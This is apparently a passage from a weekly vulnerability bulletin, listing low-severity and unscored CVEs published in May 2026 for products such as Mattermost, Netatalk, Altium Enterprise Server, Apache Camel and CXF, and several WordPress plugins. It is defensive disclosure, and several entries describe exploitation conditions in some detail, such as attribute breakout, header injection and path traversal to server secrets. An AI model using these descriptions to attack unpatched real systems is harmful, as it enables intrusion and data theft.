| xpro--Xpro Addons 140+ Widgets for Elementor | The Xpro Addons - 140+ Widgets for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_content_editor function in all versions up to, and including, 1.5.0. This makes it possible for unauthenticated attackers to create published Xpro templates. | 2026-05-20 | 5.3 | CVE-2025-15369 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cf49d3fb-de14-42bc-bf51-f9adceba0d32?source=cve https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk?rev=3508547 |
| yangzongzhuan--RuoYi-Vue | A vulnerability was found in yangzongzhuan RuoYi-Vue up to 3.9.2. Impacted is the function FileUploadUtils.upload of the file /common/upload of the component Common Upload Endpoint. Performing a manipulation results in unrestricted upload. The attack is possible to be carried out remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9374 | VDB-365338 | yangzongzhuan RuoYi-Vue Common Upload Endpoint upload FileUploadUtils.upload unrestricted upload VDB-365338 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813252 | RuoYi RuoYi-Vue 3.9.2 Cross Site Scripting |
| yog2515--General Options | The General Options plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to and including 1.1.0. This is due to the use of sanitize_text_field() for output escaping in the Contact Number (ad_contact_number) field - a function that strips HTML tags but does not encode double-quote characters to their HTML entity equivalent ("). When the stored value is echoed inside a double-quoted HTML attribute (value="..."), an attacker-supplied double-quote character breaks out of the attribute context. Even with WordPress's wp_magic_quotes mechanism (which prefixes quotes with a backslash), the resulting \" sequence is NOT treated as an escaped quote by HTML parsers - the backslash is rendered as a literal character and the bare double-quote still closes the attribute. This makes it possible for authenticated attackers with Administrator-level access and above to inject arbitrary web scripts in the admin settings page that will execute whenever any administrator visits the General Options settings page. | 2026-05-20 | 4.4 | CVE-2026-6399 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d29c69bb-4feb-477e-b18f-934ece21aff6?source=cve https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-main.php https://plugins.trac.wordpress.org/browser/general-options/trunk/direct-action.php https://plugins.trac.wordpress.org/browser/general-options/tags/1.1.0/direct-action.php |
| ZTE--MU5250 | There is an unauthorized access vulnerability in ZTE MU5250. Due to improper permission control of the Web interface, an unauthorized attacker can modify configuration through the interface. | 2026-05-19 | 6.3 | CVE-2026-44408 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2657904255874650158 |
| ZTE--MU5250 | There is an an information disclosure vulnerability in ZTE MU5250. Due to improper configuration of the access control mechanism, attackers can obtain information without authorization, causing the risk of information disclosure. | 2026-05-22 | 5.7 | CVE-2026-44409 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/3711746568357343342 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. In versions 3.15.2 and prior, the bot engine's the findResult query does not filter results by typebotId, allowing an authenticated user to load result data (user answers, variable values) from a different typebot by supplying a foreign resultId to the startChat endpoint. Exploitation is constrained by CUID2's cryptographically random 24-character IDs (making brute-force infeasible), the requirement that rememberUser be enabled, and the need for matching variable names in the current typebot. If successfully exploited, an attacker can access the original user's previous answers, session variable values, and hasStarted flag, potentially exposing PII like names, emails, and phone numbers. This issue has been fixed in version 3.16.0. | 2026-05-22 | 3.1 | CVE-2026-39967 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-f475-7m4x-m6mx https://github.com/baptisteArno/typebot.io/commit/73162634e6bdebd37a1a571db4062d30854e0400 https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Besen--BS20 EV Charging Station | A vulnerability was determined in Besen BS20 EV Charging Station up to 20260426. This impacts an unknown function of the component Bluetooth Low Energy Handler. Executing a manipulation can lead to weak password requirements. The attack needs to be done within the local network. This attack is characterized by high complexity. The exploitability is said to be difficult. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026." | 2026-05-24 | 3.1 | CVE-2026-9394 | VDB-365375 | Besen BS20 EV Charging Station Bluetooth Low Energy weak password VDB-365375 | CTI Indicators (IOB, IOC, TTP) Submit #813569 | Besen EV Charging Station BS20 EV Charger Weak Authentication https://github.com/carfeii/besen#finding-1-weak-authentication-mechanism-in-besen-home-ev-charging-station-via-ble |
| Besen--BS20 EV Charging Station | A vulnerability was identified in Besen BS20 EV Charging Station up to 20260426. Affected is an unknown function of the component BLE/UDP. The manipulation leads to insufficiently protected credentials. The attack needs to be initiated within the local network. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026." | 2026-05-24 | 3.5 | CVE-2026-9395 | VDB-365376 | Besen BS20 EV Charging Station BLE/UDP insufficiently protected credentials VDB-365376 | CTI Indicators (IOB, IOC, TTP) Submit #813572 | Besen EV Charging Station BS20 EV Charger Insufficiently Protected Credentials https://github.com/carfeii/besen#finding-2-cleartext-credential-exposure-via-ble-and-udp-in-besen-home-ev-charging-station |
| Besen--BS20 EV Charging Station | A security flaw has been discovered in Besen BS20 EV Charging Station up to 20260426. Affected by this vulnerability is an unknown functionality of the component Firmware Version Check. The manipulation results in improper restriction of rendered ui layers. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitation appears to be difficult. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026." | 2026-05-24 | 3.7 | CVE-2026-9396 | VDB-365377 | Besen BS20 EV Charging Station Firmware Version Check ui layer VDB-365377 | CTI Indicators (IOB, IOC) Submit #813575 | Besen EV Charging Station BS20 EV Charger Improper Verification of Cryptographic Signature https://github.com/carfeii/besen#finding-3-firmware-version-check-manipulation-and-ui-spoofing |
| Besen--BS20 EV Charging Station | A security vulnerability has been detected in Besen BS20 EV Charging Station up to 20260426. This affects an unknown part of the component BLE/WiFi. Such manipulation leads to authentication bypass by capture-replay. The attack must be carried out from within the local network. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The original disclosure mentions, that "[t]hese vulnerabilities have been reported to Besen and we have received their acknowlegement that they are reviewing this as of April 2026." | 2026-05-24 | 3.1 | CVE-2026-9398 | VDB-365379 | Besen BS20 EV Charging Station BLE/WiFi authentication replay VDB-365379 | CTI Indicators (IOB, IOC, TTP) Submit #813577 | Besen EV Charging Station BS20 EV Charger Improper Authorization https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands |
| Dell--PowerFlex Manager (Appliance) | Dell PowerFlex Manager, version(s) <=4.6.2, contain(s) a Use of a Broken or Risky Cryptographic Algorithm vulnerability in the ssh. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. | 2026-05-22 | 3.6 | CVE-2025-46371 | https://www.dell.com/support/kbdoc/en-us/000391568/dsa-2025-435-security-update-for-dell-powerflex-rack-multiple-third-party-component-vulnerabilities https://www.dell.com/support/kbdoc/en-us/000391392/dsa-2025-434-security-update-for-dell-powerflex-appliance-multiple-third-party-component-vulnerabilities |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by a security misconfiguration due to a missing or insecure "X-Content-Type-Options" header. This could allow browsers to perform MIME-type sniffing, potentially causing malicious content to be interpreted and executed incorrectly. | 2026-05-20 | 3.7 | CVE-2025-31985 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, contains a path traversal vulnerability that allows attackers to read arbitrary files by supplying an unvalidated transcript_path value via stdin JSON. Attackers can access any file readable by the process and the file metadata is written to a persistent cache file with insufficient permissions, creating a forensic record of accessed paths that survives process exit. | 2026-05-18 | 3.3 | CVE-2026-47091 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-path-traversal-via-transcript-path |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to escape some variables that could contain malicious content during error page composition which allows an attacker with access to edit some site configuration to execute some malicious code via injecting some JS as part of those values.. Mattermost Advisory ID: MMSA-2026-00622 | 2026-05-18 | 3.8 | CVE-2026-3495 | MMSA-2026-00622 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate that the RefreshedToken differs from the original invite token during remote cluster invite confirmation which allows an authenticated attacker to bypass token rotation and reuse the original invite token via sending a crafted invite confirmation with a RefreshedToken matching the original token. Mattermost Advisory ID: MMSA-2026-00575 | 2026-05-18 | 3.7 | CVE-2026-4273 | MMSA-2026-00575 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to check if {{team_id}} was being changed when updating playbooks, allowing users with only {{Manage Playbook Configurations}} permission to change a playbook's team, bypassing manage members restriction via PUT api. Mattermost Advisory ID: MMSA-2025-00552 | 2026-05-18 | 3.1 | CVE-2026-4286 | MMSA-2025-00552 |
| Mattermost--Mattermost | Mattermost Desktop App versions <=6.1 6.0.1 5.4.13.0 fail to prevent server-rendered content from closing an underlying application view in the Mattermost Desktop App which allows a malicious server or plugin to crash the desktop client via invoking {{window.close()}} in the renderer context, leading to a denial of service condition at the client level. Mattermost Advisory ID: MMSA-2026-00633 | 2026-05-18 | 3.5 | CVE-2026-4643 | MMSA-2026-00633 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to validate the Host header when constructing response URLs for custom slash commands which allows an authenticated attacker to redirect slash command responses to an attacker-controlled server via a spoofed Host header.. Mattermost Advisory ID: MMSA-2026-00582 | 2026-05-18 | 3.5 | CVE-2026-6333 | MMSA-2026-00582 |
| Mattermost--Mattermost | Mattermost versions 11.5.x <= 11.5.1, 10.11.x <= 10.11.13 fail to enforce client identity binding during the OAuth authorization code redemption flow which allows an authenticated OAuth client to redeem authorization codes issued to a different client via a crafted token exchange request.. Mattermost Advisory ID: MMSA-2026-00570 | 2026-05-18 | 3.1 | CVE-2026-6334 | MMSA-2026-00570 |
| n/a--JeecgBoot | A vulnerability has been found in JeecgBoot 3.9.1. This issue affects some unknown processing of the file /openapi/call/ of the component OpenAPI Endpoint. Such manipulation leads to improper authentication. The attack can be executed remotely. A high complexity level is associated with this attack. The exploitability is assessed as difficult. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.7 | CVE-2026-9373 | VDB-365337 | JeecgBoot OpenAPI Endpoint call improper authentication VDB-365337 | CTI Indicators (IOB, IOC, IOA) Submit #813251 | jeecgboot JeecgBoot 3.9.1 Improper Authentication |
| n/a--vBulletin | A vulnerability was found in vBulletin 6.x. This impacts an unknown function of the component Login. Performing a manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. VulDB is withholding an extended redistribution of exploit details to prevent simplified exploitation. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 3.5 | CVE-2026-9357 | VDB-365320 | vBulletin Login cross site scripting VDB-365320 | CTI Indicators (IOB, IOC, TTP) Submit #813052 | Cross Site Scripting no fórum vBulletin 6.xx Vbulletin 6.x.x Cross Site Scripting |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie's value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8. | 2026-05-18 | 3.9 | CVE-2026-27964 | https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd |
| Netatalk--Netatalk | A dead bounds check in the Spotlight RPC unmarshaller in Netatalk 3.0.0 through 4.4.2 results in an unreachable code path that provides no effective bounds protection, which may allow a remote authenticated attacker to obtain limited information via crafted Spotlight RPC requests. | 2026-05-21 | 3.1 | CVE-2026-44057 | Netatalk Security Advisory CVE-2026-44057 |
| Netatalk--Netatalk | A race condition in the privilege toggle mechanism in Netatalk 2.2.5 through 4.4.2 allows a local attacker to obtain limited information, modify limited data, or cause a minor service disruption. | 2026-05-21 | 3.9 | CVE-2026-44059 | Netatalk Security Advisory CVE-2026-44059 |
| Netatalk--Netatalk | An off-by-two error in lp_write() in papd in Netatalk 2.0.0 through 4.4.2 allows an adjacent network attacker to modify limited data or cause a minor service disruption via crafted print data. | 2026-05-21 | 3.7 | CVE-2026-44065 | Netatalk Security Advisory CVE-2026-44065 |
| Netatalk--Netatalk | A heap over-read in extended attribute (EA) header parsing in Netatalk 2.1.0 through 4.4.2 allows a remote authenticated attacker to obtain limited information or cause a minor service disruption via crafted EA data. | 2026-05-21 | 3.7 | CVE-2026-44067 | Netatalk Security Advisory CVE-2026-44067 |
| Netatalk--Netatalk | An integer underflow in the volxlate function in Netatalk 3.0.0 through 4.4.2 allows a local privileged user to obtain limited information, modify limited data, or cause a minor service disruption via crafted volume translation input. | 2026-05-21 | 3.4 | CVE-2026-44069 | Netatalk Security Advisory CVE-2026-44069 |
| Netatalk--Netatalk | An unbounded memory reallocation in the charset conversion code in Netatalk 2.0.0 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted character conversion requests. | 2026-05-21 | 3.1 | CVE-2026-44070 | Netatalk Security Advisory CVE-2026-44070 |
| Netatalk--Netatalk | Netatalk 3.1.2 through 4.4.2 is compiled without FORTIFY_SOURCE, which disables built-in buffer overflow detection at runtime, potentially allowing a remote attacker to cause a minor denial of service via memory errors that would otherwise be caught and safely terminated by runtime protection. | 2026-05-21 | 3.7 | CVE-2026-44071 | Netatalk Security Advisory CVE-2026-44071 |
| Netatalk--Netatalk | Netatalk 2.1.0 through 4.4.2 combines multiple errno values using bitwise OR, resulting in incorrect error codes when multiple error conditions occur simultaneously, which may allow a remote attacker to cause a minor service disruption via conditions that trigger incorrect error-handling paths. | 2026-05-21 | 3.7 | CVE-2026-44074 | Netatalk Security Advisory CVE-2026-44074 |
| Netatalk--Netatalk | A missing break statement in DSI OpenSession processing in Netatalk 1.5.0 through 4.4.2 causes a DSIOPT_ATTNQUANT switch case to fall through into DSIOPT_SERVQUANT, resulting in unintended session option handling that may allow a remote attacker to cause a minor service disruption via crafted DSI session options. | 2026-05-21 | 3.7 | CVE-2026-44075 | Netatalk Security Advisory CVE-2026-44075 |
| Netatalk--Netatalk | A format string argument mismatch in Netatalk 3.0.3 through 4.4.2 allows a remote authenticated attacker to cause a minor denial of service via crafted input that triggers incorrect format string processing. | 2026-05-21 | 3.1 | CVE-2026-7835 | Netatalk Security Advisory CVE-2026-7835 |
| Netatalk--Netatalk | An incorrect calculation in the hextoint macro in Netatalk 2.0.0 through 4.4.2 due to improper uppercase character handling allows a remote authenticated attacker to cause limited data modification via crafted hexadecimal input. | 2026-05-21 | 3.1 | CVE-2026-7836 | Netatalk Security Advisory CVE-2026-7836 |
| Netatalk--Netatalk | A time-of-check time-of-use (TOCTOU) condition in the ad_flush function in Netatalk 3.0.0 through 4.4.2 involves root-privileged file operations, which may allow a remote attacker to cause limited data modification under specific race conditions. | 2026-05-21 | 3.7 | CVE-2026-7837 | Netatalk Security Advisory CVE-2026-7837 |
| Netatalk--Netatalk | Netatalk 2.2.1 through 4.4.2 calls system() after a failed chdir() without properly handling the error condition, which allows a local privileged user to execute unintended commands or cause a minor service disruption under specific conditions. | 2026-05-21 | 2.5 | CVE-2026-44072 | Netatalk Security Advisory CVE-2026-44072 |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-25110 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-27781 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-28751 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS. | 2026-05-19 | 3.3 | CVE-2026-33565 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| opensourcepos--Open Source Point of Sale | A flaw has been found in opensourcepos Open Source Point of Sale up to 3.4.2. Impacted is the function Login of the file app/Models/Employee.php of the component Employee Login. This manipulation causes use of weak hash. Remote exploitation of the attack is possible. The attack is considered to have high complexity. The exploitability is considered difficult. The actual existence of this vulnerability is currently in question. The vendor explains: "[T]he code is still there to allow the upgrade path to work. The default password is initially seeded with the old hash function, but then migrated to a newer one after login. [T]he hash version check might be cleaned up in the future. Currently it's not actively in use as any password change will use a newer hash function." | 2026-05-18 | 3.7 | CVE-2026-8803 | VDB-364436 | opensourcepos Open Source Point of Sale Employee Login Employee.php login weak hash VDB-364436 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #802561 | opensourcepos Open Source Point of Sale 3.4.1 Weak Encoding for Password |
| QuantumNous--new-api | A security vulnerability has been detected in QuantumNous new-api up to 0.12.1. This affects the function RelayMidjourneyImage/GetByOnlyMJId of the file router/relay-router.go of the component Midjourney Image Relay Endpoint. Such manipulation leads to authorization bypass. The attack can be launched remotely. The attack requires a high level of complexity. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 3.7 | CVE-2026-9306 | VDB-365253 | QuantumNous new-api Midjourney Image Relay Endpoint relay-router.go GetByOnlyMJId authorization VDB-365253 | CTI Indicators (IOB, IOC, IOA) Submit #812196 | QuantumNous new-api 0.12.1 Authorization Bypass Through User-Controlled Key (CWE-639) https://gist.github.com/YLChen-007/13974ead25fc6dac42fd7bac62fbb2df |
| RsyncProject--rsync | Rsync versions before 3.4.3 contain an off-by-one out-of-bounds stack write vulnerability in the establish_proxy_connection() function in socket.c that allows network attackers to corrupt stack memory by sending a malformed HTTP proxy response. Attackers can exploit this by positioning themselves between the client and proxy or controlling the proxy server to send a response line of 1023 or more bytes without a newline terminator, causing a null byte to be written to an out-of-bounds stack address when the RSYNC_PROXY environment variable is set. | 2026-05-20 | 3.1 | CVE-2026-45232 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-8f85-j2cv-59m8 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-off-by-one-stack-write-via-http-proxy |
| SourceCodester--SUP Online Shopping | A vulnerability was identified in SourceCodester SUP Online Shopping 1.0. The impacted element is an unknown function of the file /admin/productedit.php. The manipulation of the argument productName leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-24 | 2.4 | CVE-2026-9377 | VDB-365340 | SourceCodester SUP Online Shopping productedit.php cross site scripting VDB-365340 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813270 | sourcecodester SUP Online Shopping Project V1.0 Cross Site Scripting https://github.com/redshadowword-cell/CVE/issues/13 https://www.sourcecodester.com/ |
| SPIP--SPIP | action/cookie.php in ecrire in SPIP before 4.4.15 is prone to an open redirect vulnerability. | 2026-05-24 | 3.5 | CVE-2026-48832 | https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-15.html?lang=fr https://git.spip.net/spip/spip/-/commit/75629034697ab52a963a340afd10930407e1cd55 https://git.spip.net/spip/ecrire/-/commit/a22cb8a56f1e37ff3854b73ff3f66aa3df47070a |
| ulisesbocchio--jasypt-spring-boot | A weakness has been identified in ulisesbocchio jasypt-spring-boot up to 3.0.5/4.0.4. Affected by this vulnerability is the function getSecretKeySaltGenerator of the file jasypt-spring-boot/src/main/java/com/ulisesbocchio/jasyptspringboot/encryptor/SimpleGCMConfig.java of the component Password Hash Handler. Executing a manipulation can lead to use of a one-way hash with a predictable salt. The attack can be launched remotely. The attack requires a high level of complexity. The exploitation appears to be difficult. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-24 | 3.7 | CVE-2026-9370 | VDB-365333 | ulisesbocchio jasypt-spring-boot Password Hash SimpleGCMConfig.java getSecretKeySaltGenerator hash predictable salt VDB-365333 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #813198 | Ulises Bocchio jasypt-spring-boot 3.0.0 to 4.0.4 Cryptographic Issues https://github.com/ulisesbocchio/jasypt-spring-boot/issues/431 https://github.com/dntyfate/cve/issues/3 https://github.com/ulisesbocchio/jasypt-spring-boot/ |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 9front--9front | Mothra would respect a default value given by a website for HTML file upload forms. An attacker could craft a website with a malicious default file path, and then conceal this form element. | 2026-05-22 | not yet calculated | CVE-2026-9053 | https://git.9front.org/plan9front/9front/d145acc9ef0da47131af6ad94e87264e04870d47/commit.html |
| 9front--9front | An attacker sending tcp, il, rudp, rudp, or gre packets with a length less than the header size would trigger a kernel panic. | 2026-05-22 | not yet calculated | CVE-2026-9054 | https://git.9front.org/plan9front/9front/7838d68969549f938cc8e80c0c2b4218cb12805c/commit.html https://git.9front.org/plan9front/9front/f86917b75e9562f90545b7e484dbdcd748236952/commit.html https://git.9front.org/plan9front/9front/70c97c334171c715df82774d1a47638abaca2db4/commit.html |
| Advantech--WebAccess/SCADA 8.0-2015.08.16 | Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component | 2026-05-22 | not yet calculated | CVE-2026-36226 | https://github.com/NullByte8080/CVE-2026-36226 |
| Altium--Altium 365 | A missing authentication vulnerability exists in the Altium 365 SearchService. A legacy SOAP endpoint exposes search index operations without requiring authentication, session tokens, or any form of identity verification. An unauthenticated network attacker who can reference a target workspace's identifier can interact with that workspace's search index, crossing tenant boundaries. Successful exploitation allows reading a workspace's indexed contents (such as component data, project and folder names, and user metadata) and injecting, modifying, or deleting search index entries. These operations affect the search index only, not the underlying vault data, but they can disclose sensitive workspace information and compromise the integrity and availability of search results. Altium 365 cloud deployments are affected; on-premise Altium Enterprise Server is not affected. | 2026-05-21 | not yet calculated | CVE-2026-9152 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server ComparisonService due to missing filename sanitization in the Gerber file upload APIs. A regular authenticated workspace user can supply a crafted filename in the multipart Content-Disposition header to escape the intended temporary upload directory and write arbitrary files to any location on the server filesystem. Because content-controlled files can be written to web-accessible directories, this can be escalated to remote code execution in the context of the service account. It can also be used to overwrite application binaries or configuration files, leading to service takeover or denial of service. | 2026-05-20 | not yet calculated | CVE-2026-9102 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Viewer StorageController due to improper handling of file path route parameters. On on-premise deployments that use local filesystem storage, a regular authenticated user can supply a URL-encoded absolute path (such as an encoded drive letter) in a Viewer storage API request, causing the configured storage root to be discarded and allowing arbitrary files to be read from the server filesystem. Because the readable files include the server's master configuration, which stores database credentials, signing key locations, certificate passwords, and OAuth secrets, exploitation can lead to disclosure of all server secrets and full compromise of the server and its data. Cloud deployments are not affected, as they use object storage and do not enable this component. | 2026-05-20 | not yet calculated | CVE-2026-9129 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMD[.]com--AMD EPYC 4004 | Improper input validation in the System Management Mode (SMM) communications buffer could allow a privileged attacker to perform an out of bounds read or write to a limited section of the Top of Memory Segment (TSEG) memory region, potentially resulting in loss of confidentiality or integrity. | 2026-05-19 | not yet calculated | CVE-2024-36343 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| Apache Software Foundation--Apache Airflow Amazon provider | In the AWS Secrets Manager and SSM Parameter Store secrets backends of `apache-airflow-providers-amazon` prior to 9.28.0, the team-scoping logic could resolve a `conn_id` containing a `/` (e.g. `"my_team/conn"`) to the same path as another team's team-scoped secret when the caller had no team context. A privileged caller without team context could therefore retrieve another team's secret by crafting a colliding `conn_id`. Fixed in 9.28.0 by switching the team-scope separator to `--` and rejecting team-shaped `conn_id`s when team context is absent. Affects the experimental multi-tenant teams feature only. Users are recommended to upgrade to `apache-airflow-providers-amazon` 9.28.0, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-42526 | https://github.com/apache/airflow/pull/65703 https://lists.apache.org/thread/0092sz5g520d3qqjb01wd61myqlgjtyn |
| Apache Software Foundation--Apache Airflow CNCF Kubernetes provider | JWT tokens that were used by workers in Kubernetes Executors have been exposed to users who had read only access to Kuberentes Pods. This could allow users with just read-only access to perform actions that were only available to running tasks via Task SDK and potentially allow to modify state of Airflow Database for tasks. | 2026-05-19 | not yet calculated | CVE-2026-27173 | https://github.com/apache/airflow/pull/60108 https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw |
| Apache Software Foundation--Apache Camel | Camel-CXF and Camel-Knative Message Header Injection via Missing Inbound Filtering The CXF and Knative HeaderFilterStrategy implementations (CxfRsHeaderFilterStrategy in camel-cxf-rest, CxfHeaderFilterStrategy in camel-cxf-transport, and KnativeHttpHeaderFilterStrategy in camel-knative-http) only filter outbound Camel-internal headers via setOutFilterStartsWith, while not configuring inbound filtering via setInFilterStartsWith. As a result, an unauthenticated attacker can inject Camel-internal headers (e.g. CamelExecCommandExecutable, CamelFileName) via HTTP requests to CXF-RS or CXF-SOAP endpoints. When a route forwards messages from these endpoints to header-driven components such as camel-exec or camel-file, the injected headers override configured values, enabling remote code execution or arbitrary file writes. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177), the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453). This issue affects Apache Camel: from 3.18.0 before 4.14.6, from 4.15.0 before 4.18.2. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.2. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. | 2026-05-19 | not yet calculated | CVE-2026-47323 | https://camel.apache.org/security/CVE-2026-47323.html |
| Apache Software Foundation--Apache Camel K | (Externally Controlled Reference to a Resource in Another Sphere), (Authorization Bypass Through User-Controlled Key) vulnerability in Apache Camel K. Authorized users in a Kubernetes namespace can create a Build resource, controlling the Pod generation in a namespace of their choice, including the operator namespace. This issue affects Apache Camel K: from 2.0.0 before 2.8.1, from 2.9.0 before 2.9.2, from 2.10.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1 (or 2.8.1 or 2.9.2), which fixes the issue. | 2026-05-21 | not yet calculated | CVE-2026-45760 | https://camel.apache.org/security/CVE-2026-45760.html |
| Apache Software Foundation--Apache CXF | The fix for CVE-2025-48913: Apache CXF: Untrusted JMS configuration can lead to RCE was not complete, meaning that another path in the code might lead to code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44417 | https://lists.apache.org/thread/bqg6gjy2cx7rfyqjxcpv3jwjvmclvz4o |
| Apache Software Foundation--Apache CXF | Insecure XML parser configuration in Apache CXF's WS-Transfer module may allow attackers to perform XXE attacks. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44618 | https://lists.apache.org/thread/c7vb015f8ljmjl44030mn0yfq71f7sd7 |
| Apache Software Foundation--Apache CXF | An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates from the repository. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44930 | https://lists.apache.org/thread/c1zqxppo1m5z3kbdhjn5p991zk09ynkh |
| Apache Software Foundation--Apache Fory | Deserialization of untrusted data in Apache Fory PyFory. PyFory's ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory: from before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue. | 2026-05-21 | not yet calculated | CVE-2026-48207 | https://fory.apache.org/security/#cve-2026-48207-pyfory-reduceserializer-deserializationpolicy-bypass |
